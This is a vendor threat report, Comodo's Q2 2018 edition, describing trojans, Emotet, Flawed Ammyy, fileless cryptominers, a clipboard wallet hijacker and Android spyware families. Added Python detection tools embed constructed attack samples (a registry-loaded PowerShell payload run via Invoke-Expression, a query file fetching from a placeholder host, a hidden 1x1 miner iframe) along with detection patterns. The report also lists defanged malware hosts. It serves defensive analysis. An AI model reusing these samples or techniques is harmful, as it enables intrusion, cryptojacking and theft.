ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800, www.comodo.co.in

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 ALL RIGHTS RESERVED. COMODO SECURITY SOLUTIONS, INC. VISIT COMODO.COM

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees), analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


Global Threat Report Q2 2018 Edition

Page 5 of 73

Distribution of top 30 Malware Families

In this list of the 30 top malware families, where trojans overwhelmingly dominate, you can find samples of this malware exhibiting diverse types of malicious activity.

For example, the leader of the attacks in Q2, TrojWare.Win32.Agent, is a trojan family that clandestinely penetrates users' computers and then downloads other malware from a cybercriminal server. The downloaded malware can be of any type.

Number two in the list, TrojWare.JS.Clickjack, exhibits different activity: it makes users unintentionally click on hidden links. The link can be just another advertisement or lead to a malicious website that infects users with other types of malware.

TrojWare.JS.Faceliker just clicks posts on Facebook on behalf of the user to promote fake or fraudulent pages. The malware infects users' browsers when they visit malicious or compromised websites. Then, when infected users open Facebook, Faceliker hijacks their "likes".

TrojWare.Win32.Kryptik steals information from computers and sends it to the cybercriminals' Command-and-Control server.


TrojWare.Win32.Injector uses process injection as its main technique for taking malicious actions. It is mostly used to bypass security products.

TrojWare.JS.Downloader consists of scripts that download and execute malware from the Internet. It is usually spread via a phishing email.

Such diversity of malicious activity and their special ability to hide have always made trojans one of the hardest kinds of malware to fight. But in Q2 2018 they became even more sophisticated and dangerous. Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community.

First among the trends is an explosive mixture of trojans and phishing emails. Earlier, phishing emails mostly contained a link to a malicious website to lure victims into supplying their credentials. But today phishing emails have become a potent means of delivery for trojans and other malware. These trojans steal credentials and private information by ferreting through infected machines in search of valuable data, then send it to cybercriminals' servers.

The accompanying graph shows the most popular malware spread via email. Note that 18 of 20 are trojans.

Distribution of Phishing Families of Malware


2.1 The Most Widespread Trojan

The most proliferated trojan, TrojWare.Win32.Injector, is designed to steal credentials from infected computers. It was spread via a fake email imitating a message from a shipping and trading company. As seen in the screenshot, the attached malware is carefully disguised with a plausible name and icon to look like a real scanned document.

If a user takes the bait and runs the file, it copies itself to %AppData% as D5E2DEE36C7A.exe, then launches itself from that location and starts to gather credentials present in the system.

It collects credentials and private data from known browsers, email clients, FTP clients, WebDAV and SCP clients. Then it sends all the collected data to the attackers' server, httpcallbedmlpackfarefrephp.

The phishing email


2.2 PowerShell-based attack with Emotet

Another alarming trend is related to the malware itself rather than its delivery method. Often cybercriminals use malware based not on Windows native .exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer. This type of attack is much harder to detect with antivirus tools.

Emotet is one of the most aggressive trojans currently active in cyberspace. Spread by various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.

The following attack started with an email that imitated a message from the IRS about a "Tax Account Transcript". Notice the message is written in a cheerful manner to inspire user trust.

The phishing email


The attached file is an Office document containing a VBScript. As the default settings of a newly installed Microsoft Office do not allow execution of such scripts, the attackers added a special prompt to convince victims to turn on VBScript execution.

The special option to convince the victims to turn on VBScript execution


The purpose of the VBScript is to launch PowerShell.


The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlc, hxxpwwwthecyberconxioncomPUqUUe, hxxpEliasWesselcomvu6xGmS, hxxpmossbeachmusicdeXuBBN6r and hxxpairmaxxrswIdY.

At the time of writing, only the thecyberconxion.com host was serving a malware binary (SHA1: 5974190561e707f63d776e55336841bd871eebdb).

The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service, "lanesviewer", to ensure persistence.

The malware creates the "lanesviewer" service to ensure persistence


After that, Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.

The next example is even more cunning because it infects computers using popular, legitimate Microsoft software.

2.3 Flawed Ammyy RAT attack based on legitimate software

The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on legitimate software called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a thief's tool.

Ammyy Admin is remote desktop software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.

The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.


As you can see in the diagram, Ammyy Admin was used in spreading many types of nefarious malware.

The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It is a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets attackers use functions such as remote desktop control, a file system manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, etc.

The way Flawed Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users. What is especially worth noticing is that this trick is also based on using legitimate software, this time from Microsoft.


Flawed Ammyy is delivered to victims through phishing emails with an IQY file attachment, as in the following screenshot.

The phishing email

IQY files are intended for making an Internet query from MS Excel, so an IQY contains a URL and other related parameters. It can download files and run them directly in MS Excel.

The infected IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.

Malware runs PowerShell


Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.
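Because an IQY attachment is plain text whose third line is the URL Excel will fetch, a mail gateway can triage it before Excel ever opens it. The following parser and allowlist check is an added example (not code from the report); the sample IQY, its hostname and the allowlist are constructed for illustration.

```python
"""Triage helper for .iqy (Excel Internet Query) mail attachments."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed sample in the IQY layout described above: "WEB", a version line,
# the URL to fetch, then key=value options. The host is a placeholder (.test TLD).
SAMPLE_IQY = (
    "WEB\r\n"
    "1\r\n"
    "http://example-invalid.test/f.txt\r\n"
    "\r\n"
    "Selection=EntirePage\r\n"
    "Formatting=None\r\n"
    "PreFormattedTextToColumns=True\r\n"
)


@dataclass
class IqyFile:
    query_type: str
    version: str
    url: str
    options: dict = field(default_factory=dict)


def parse_iqy(text: str) -> IqyFile:
    """Parse the IQY text: header, version, URL, then key=value option lines."""
    lines = [ln.strip() for ln in text.lstrip("\ufeff").splitlines()]
    lines = [ln for ln in lines if ln]  # blank separator lines carry nothing
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not a WEB query file")
    options = {}
    for ln in lines[3:]:
        if "=" in ln:
            key, value = ln.split("=", 1)
            options[key.strip()] = value.strip()
    return IqyFile(lines[0], lines[1], lines[2], options)


def assess_iqy(text: str, allowed_hosts: set) -> list:
    """Return the reasons an attachment should be held for review.

    An empty list means the query only pulls data from an approved host;
    anything else is the pattern described above: an Excel query file that
    makes the workstation fetch content from an arbitrary external server.
    """
    try:
        iqy = parse_iqy(text)
    except ValueError as err:
        return [f"unparseable: {err}"]
    parsed = urlparse(iqy.url)
    findings = []
    if parsed.scheme.lower() not in ("http", "https"):
        findings.append(f"non-web scheme {parsed.scheme!r}")
    host = (parsed.hostname or "").lower()
    if host not in allowed_hosts:
        findings.append(f"query pulls data from unapproved host {host!r}")
    if re.match(r"^\d{1,3}(\.\d{1,3}){3}$", host):
        findings.append("raw IP address instead of a hostname")
    return findings
```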

2.4 The growth of Flawed Ammyy attacks for Q2

The growth of Flawed Ammyy attacks for Q2

2.5 Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and manipulating users. This trend is a real gift for cybercriminals and a terrible nightmare for users.

Trojans let attackers gain time. As the malware acts covertly, cybercriminals have more than enough time to use stolen data to their advantage. In many cases attacks can only be discovered too late, after money is withdrawn from a bank account, confidential data is published, etc. The merging of trojans as payloads and phishing emails as the means of delivery observed during Q2 will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.

To fight these attacks, cybersecurity departments need to rearrange their approach to security measures according to the new trends above. Combining the best malware detection tools with methods of protecting data built on defense-in-depth principles provides the most promising solution.

[Chart: The growth of Flawed Ammyy attacks for Q2 (section 2.4). Monthly data labels in order Apr, May, Jun: 43,188; 46,382; 48,881. Vertical axis 40,000 to 50,000.]


3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new dangerous abilities.

Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: at least cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.

But Q2 events clearly showed that the situation has radically changed.

New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and to fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.

3.1 BadShell attacks enterprises

Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware is malicious code injected into legitimate OS processes. It need not be installed on the victim machine but functions only in memory, making it much harder for antiviruses to detect.

Usually such malware is spread via malicious ad banners. Clicking on a banner redirects the user to an infected website, where the malware covertly installs itself onto the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.

Last quarter, Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.


Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence and the Registry to hold the malicious binary code. In the screenshots below you see exactly how the malware, dubbed BadShell, works.

If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.

BadShell at work


The malicious code in the registry
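The decoding step just described, together with the Emotet case in section 2.2, is something an endpoint detection rule can automate: PowerShell's -EncodedCommand argument is Base64 over UTF-16LE, and once decoded, a script that reads a registry value, Base64-decodes it and executes the result in memory is the BadShell chain. The following decoder and triage heuristic is an added example, not code from the report; the sample command line, the registry key HKCU:\Software\Classes\ExampleKey and its Payload value are constructed for illustration.

```python
"""Decode PowerShell -EncodedCommand arguments and flag the registry-resident,
in-memory payload pattern described for BadShell."""
import base64
import re


def encode_command(script: str) -> str:
    """PowerShell expects Base64 over the UTF-16LE encoding of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: the real BadShell command line only appears as a screenshot
# above. Key and value names are placeholders, not the malware's own.
SAMPLE_SCRIPT = (
    "$p = (Get-ItemProperty -Path 'HKCU:\\Software\\Classes\\ExampleKey').Payload;"
    "$b = [Convert]::FromBase64String($p);"
    "Invoke-Expression ([Text.Encoding]::ASCII.GetString($b))"
)
SAMPLE_CMDLINE = (
    "powershell.exe -NoProfile -WindowStyle Hidden -enc " + encode_command(SAMPLE_SCRIPT)
)

# -e / -ec / -enc / -EncodedCommand are all accepted abbreviations of the flag.
_ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded script, or None when no encoded command is present."""
    match = _ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Each indicator alone is common in admin scripts; the combination is what matters.
INDICATORS = [
    ("reads_registry", re.compile(r"Get-ItemProperty|GetValue\(|HK(?:CU|LM):", re.I)),
    ("decodes_base64", re.compile(r"FromBase64String", re.I)),
    ("executes_in_memory", re.compile(r"Invoke-Expression|\biex\b|Reflection\.Assembly", re.I)),
    ("hidden_window", re.compile(r"-(?:w|windowstyle)\s+hidden", re.I)),
]


def triage_cmdline(cmdline: str) -> dict:
    """Decode the command line and report which indicators fire.

    badshell_like is set only when the script reads the registry, decodes
    Base64 and executes the result without touching disk, i.e. the chain
    seen in the screenshots above.
    """
    script = decode_encoded_command(cmdline) or ""
    text = cmdline + "\n" + script
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    chain = {"reads_registry", "decodes_base64", "executes_in_memory"} <= set(hits)
    return {"decoded": script, "indicators": hits, "badshell_like": chain}
```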


This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the company's financial losses were irreversible.

Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into a slave of the attacker.

3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.

The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task: mining cryptocurrency. The other runs in the background looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.

WinstarNssmMiner spreading around the world


Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out from other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.

CoinMiner kills its rivals as follows:

The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.


The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, with the names of the processes it is instructed to kill. The lists include other types of cryptominers.

In this way CoinMiner occupies the victim's computer undividedly, using its resources for mining cryptocurrency.


Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, easing detection by users. In Q2 these cryptominers learned to hide. CoinHive is the brightest example.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and cybersecurity reports, users have started checking website code for cryptominers. But in the second quarter perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the presence of CoinHive with URL shorteners.


As a result, the malicious code on a webpage looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe.

The iframe loads the URL shortener. Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we find the familiar link to CoinHive.

The link to CoinHive


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any sign of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
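A page scanner that only greps for the CoinHive script misses exactly this variant, but it can still be caught by decoding the Base64 string and looking at what it produces: a 1x1 iframe pointing at the cnhv.co short-link domain. The following scanner is an added example, not code from the report; the sample page and its short-link key are constructed, and the decoding goes a few layers deep so that a Base64 string that itself decodes to another encoded string is also unwrapped.

```python
"""Find hidden cryptominer iframes, including ones written by decoded Base64 strings."""
import base64
import re
from html.parser import HTMLParser

# coinhive.com is the miner's own host; cnhv.co is the short-link domain shown above.
MINER_HOSTS = ("coinhive.com", "cnhv.co")

# Constructed sample page: an encoded string written into the document that
# decodes to a 1x1 iframe. The key after cnhv.co/ is a placeholder.
_HIDDEN = '<iframe src="https://cnhv.co/EXAMPLE-KEY" width="1" height="1" frameborder="0"></iframe>'
SAMPLE_PAGE = (
    "<html><body><p>Welcome</p>\n"
    '<script>document.write(atob("' + base64.b64encode(_HIDDEN.encode()).decode() + '"));</script>\n'
    "</body></html>"
)

_B64 = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")  # long Base64-looking runs only


def decoded_layers(source: str, max_depth: int = 3) -> list:
    """Return the source plus every Base64 blob in it that decodes to text, recursively."""
    layers, queue = [], [source]
    for _ in range(max_depth):
        nxt = []
        for text in queue:
            layers.append(text)
            for blob in _B64.findall(text):
                try:
                    out = base64.b64decode(blob, validate=True).decode("utf-8")
                except (ValueError, UnicodeDecodeError):
                    continue  # binary or not really Base64
                if all(ch.isprintable() or ch in "\r\n\t" for ch in out):
                    nxt.append(out)
        queue = nxt
        if not queue:
            break
    return layers


class _IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))


def find_miner_iframes(source: str) -> list:
    """Flag iframes that point at a miner host and are sized or styled to be invisible."""
    findings = []
    for layer in decoded_layers(source):
        collector = _IframeCollector()
        collector.feed(layer)
        for frame in collector.iframes:
            src = (frame.get("src") or "").lower()
            width = (frame.get("width") or "").strip()
            height = (frame.get("height") or "").strip()
            tiny = width in ("0", "1") and height in ("0", "1")
            style = (frame.get("style") or "").replace(" ", "").lower()
            hidden = "display:none" in style or "visibility:hidden" in style
            if any(host in src for host in MINER_HOSTS) and (tiny or hidden):
                findings.append({"src": frame.get("src"), "tiny": tiny, "hidden_style": hidden})
    return findings
```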

The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed characters and numbers, so it is almost impossible to remember or fill in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it swaps it for the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers. But cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack:

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world
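The defence against the swap shown above is to compare what the user copied with what is about to be pasted, and to check the pasted address's format before sending. The following guard is an added example, not code from the report; it simulates clipboard events in memory rather than reading the OS clipboard, and the address regex is a heuristic for common Bitcoin and Ethereum formats. The Base58Check routine is the standard legacy-address checksum.

```python
"""Guard against wallet-address substitution in the clipboard."""
import hashlib
import re

_B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Legacy Bitcoin (1.../3...), bech32 (bc1...) and Ethereum (0x...) address shapes.
_ADDRESS_RX = re.compile(
    r"\b(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[a-z0-9]{20,}|0x[0-9a-fA-F]{40})\b"
)


def base58check_ok(addr: str) -> bool:
    """Validate a legacy Bitcoin address: the last 4 bytes are a double-SHA256 checksum."""
    n = 0
    for ch in addr:
        idx = _B58.find(ch)
        if idx < 0:
            return False
        n = n * 58 + idx
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    leading_ones = len(addr) - len(addr.lstrip("1"))  # each leading '1' is a 0x00 byte
    raw = b"\x00" * leading_ones + raw
    if len(raw) != 25:  # version byte + 20-byte hash + 4-byte checksum
        return False
    digest = hashlib.sha256(hashlib.sha256(raw[:-4]).digest()).digest()
    return digest[:4] == raw[-4:]


def address_kind(addr: str) -> str:
    if addr.startswith("0x"):
        return "eth"
    if addr.startswith("bc1"):
        return "btc-bech32"
    if addr.startswith("3"):
        return "btc-p2sh"
    if addr.startswith("1"):
        return "btc-p2pkh"
    return "unknown"


class ClipboardGuard:
    """Remembers the address the user copied and flags a paste that differs.

    The hijacker described above rewrites the clipboard between copy and paste,
    so the only trustworthy reference is the text captured at copy time.
    """

    def __init__(self):
        self.expected = None

    def on_copy(self, text: str) -> None:
        match = _ADDRESS_RX.search(text)
        self.expected = match.group(0) if match else None

    def check_paste(self, clipboard_now: str):
        """Return None when the paste is consistent, else an alert describing the swap."""
        match = _ADDRESS_RX.search(clipboard_now)
        if not self.expected or not match:
            return None
        found = match.group(0)
        if found == self.expected:
            return None
        return {
            "copied": self.expected,
            "pasted": found,
            "kind_changed": address_kind(found) != address_kind(self.expected),
            "swap_detected": True,
        }
```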

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions:

Version-1: Naver Defender

Version-2: Netease Defender

Version-3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details and contacts (ID, name, phone numbers and email address of the owner). It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server httphttpcgalimcomadminhrpupuphpdo=upload.

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.

Version-1: Dardesh (Google Play Services Instant Apps)

Version-2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version-1: Telegram Groups, انتخاب دھم

Version-2: Postrall, Yes For Referendum, انتخاب دھم

Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机

Version-4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is included in spyware named "Spymaster Pro" and can:

• Enable and disable the GPS services
• Record audio and send it to the Command & Control server
• Upload image files
• Collect information about the applications installed
• Collect browser data
• Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.


In addition to the abilities of previous versions, it includes some additional tricks:

• Extracts photos, audio and video
• Records the screen
• Executes shell commands
• Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messengers' data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

• Takes control over the Bluetooth adapter
• Extracts data about accounts, contact details and installed apps
• Extracts data from the WhatsApp message DB and related keys
• Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3: FaceBook, Chrome

Disguises of Xloader


After infection, Xloader connects to its C&C server and executes the following commands:

• Extract the device information
• Delete SMS
• Set ringer mode
• Monitor incoming SMS messages
• Clear memory
• Check for the presence of the following banking applications: comwooribankpibsmart, comkbstarkbbank, comibkneobanking, comscdanbscbankapp, comshinhansbanking, comhanabankebkchannelandroidhananbank, nhsmart, comepostpsfsdsi, comkftckjbsmb, comsmgspbs
• Extract contact details
• Set Wi-Fi to always on

Version 2 can execute additional commands:

• Send SMS and read outgoing SMS
• Enable and disable a Wi-Fi connection
• Access a location specified by the attackers
• Make recordings
• Make calls

4.1.5 Stalker Spy. The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

Disguises of Stalker Spy (app distribution): FlexiSpy, MBackup, HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service, Mobile Spy, 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻

In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot. The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it "a spy with a 007 license".

Disguises of Mystery Bot: Version 1: Adobe Flash Player; Version 2: Flash Player

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:


Send_SMS: extract SMS content and send it to the C&C server

Send_USSD: send the USSD to the C&C server

Gethistory: monitor browser history

Start_AllApp: gather info about installed applications

Send_call: set the Intent action to call

Forward_call: forward incoming calls

ResForward_call: reset call forwarding

Go_Smsmnd: delete SMS content

Go_GetAlls: get SMS history

Dell_sms: delete SMS content in a conversation

Send_spam: send spam SMS

Start_Inject: call the injectors class

4.1.7 FakeSpy. FakeSpy also has many masks, as you can see in the screenshot.

Disguises of FakeSpy: 佐川急便, 현대캐피탈

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

contacts: get contact details and email ID

Mute: set action to mute

Mms: get MMS content

info: get device information


4.1.8 RedAlert. RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

